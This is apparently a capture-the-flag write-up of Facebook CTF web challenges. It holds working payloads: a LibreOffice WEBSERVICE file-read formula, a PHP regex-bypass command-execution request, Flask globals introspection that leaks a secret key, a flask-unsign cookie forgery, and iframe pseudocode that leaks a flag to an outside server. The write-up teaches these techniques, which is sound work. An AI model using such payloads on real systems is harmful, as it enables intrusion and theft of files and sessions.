Solving each and every fb-ctf challenge PART 1

Write-up of all the challenges which were in fb-ctf web category

Piyush Raj
Jun 15 · 14 min read
Sad.
No, I found it funny as well :P

Let the hacking begin

From The Social Network

Web :: product manager

Description

Description

Solution

We had the luxury of viewing the source-code for this challenge.

db.php
db.php

Vulnerability

All MySQL collations are of type PADSPACE. 
This means that all CHAR, VARCHAR, and TEXT
values in MySQL are compared without regard
to any trailing spaces.

Exploit!

The password is desc itself
Product has been added
Exploited! non-1337 flag : attacking_sqi_without_injection_is_amazing_:)

Web :: pdfme

Description

Exploring the challenge

Welcome Page

What the hell is .fods?

OpenDocument Spreadsheet XML Definition
Generated 1.pdf, yeah Mr. Robot ❤
dirb http://challenges.fbctf.com:8084/
Looking into Metadata
No, it’s not
LibreOffice Security Advisories Page

Try #2:

Success!
Definitely not the way to go.
Wow.
=WEBSERVICE("/home/libreoffice_admin/flag")

Web :: secret note keeper

Welcome Screen
Saving a note named “ping”
<iframe> ❤
And I can access it!

Basic workflow to get the flag :

  1. Start a server on port 80, port-forward so that it’s reachable.
  2. Write a python script that solves pow (proof-of-work) and makes a Bug Report submit request to challenges.fbctf.com:8082 with the URL of our server serving the exploit.
  3. Write the main exploit sandwich.

Pseudo code of our exploit

chars = ‘All printable character list’;
target = “http://challenges.fbctf.com:8082/search?query="
attr = document.createElement(‘iframe’);
function exploit() {
for char in chars:
iframe src => “http://challenges.fbctf.com:8082/search?query=" + “fb{“
console.log(“leaked data = “ + “fb{“ + char);
attr.onload = () => {
if (attr.contentWindow.frames.length != 0) {
ping.own.server.with.data(“fb{“ += char, “POST”, “no-cors”)
}
}
exploit()
flag : fb{cr055_s173_l34|<5_4r4_c00ool!!}

web :: rceservice

Description

index.php
works on PHP 7.2
{“cmd” : “ls -la”, “test” : “aaaaaaaaaa …”}
Hacking Attempt detected, Again?
Oops.
putenv('PATH=/home/rceservice/jail');
import requests;payload = '{"cmd":"cd /home/rceservice/ && /bin/cat flag", "test" : "' + "a"*(1000000) + '"}';requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload}).text
w0ot!
Insane!

web :: events

Description

Welcome Page
Hmmm …
Result
Aha!
Payload :
__init__.__dict__
Output :
{‘_sa_original_init’: <function _declarative_constructor at 0x7fb2c3a6f730>}
__init__.__globals__
Contents of __globals__
Payload :
__init__.__globals__[app]
Output :
<Flask 'app'>
Payloads :
__init__.__globals__[app].config.__dict__
__init__.__globals__[app].__dict__
Yipee! Finally! or not?
Yay, we have it! ( http://flask.pocoo.org/docs)
Header parameter: Cookie
Engine: Twig
Injection: 1:1})}}*{{1
Context: code
OS: undetected
Technique: blind
Capabilities:
Shell command execution: no
Bind and reverse shell: no
File write: no
File read: no
Code evaluation: ok, php code (blind)
flask-unsign --sign --cookie "admin" --secret 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
Cookie, Cookie
wo0t!
Moving right along. (Line from The Social Network)

FUN FACT

Moral of the story : One can 957 pts just for getting lucky!

or maybe one should try all l33t credentials if there’s a common ground. (sure, you’ll learn nothing, no, I don’t want it.)

web :: hr_admin_module

Description

Welcome Page

And, it’s a wrap, keep an eye for PART 2

About the Author

Piyush Raj is now a 18 year old college freshmen currently working with OWASP Foundation as a Google Student Developer or say GSoCer. He’s past Google Code-In Contribution Winner, and loves playing football.

Social Jazz.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. #sharingiscaring

Piyush Raj

Written by

Global Google Code-In Winner🏆. Independent Security Researcher, Developer & Open Source Lover. Have hacked @Motorola, @OnePlus, @Sony, @IIT-B and many others.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. #sharingiscaring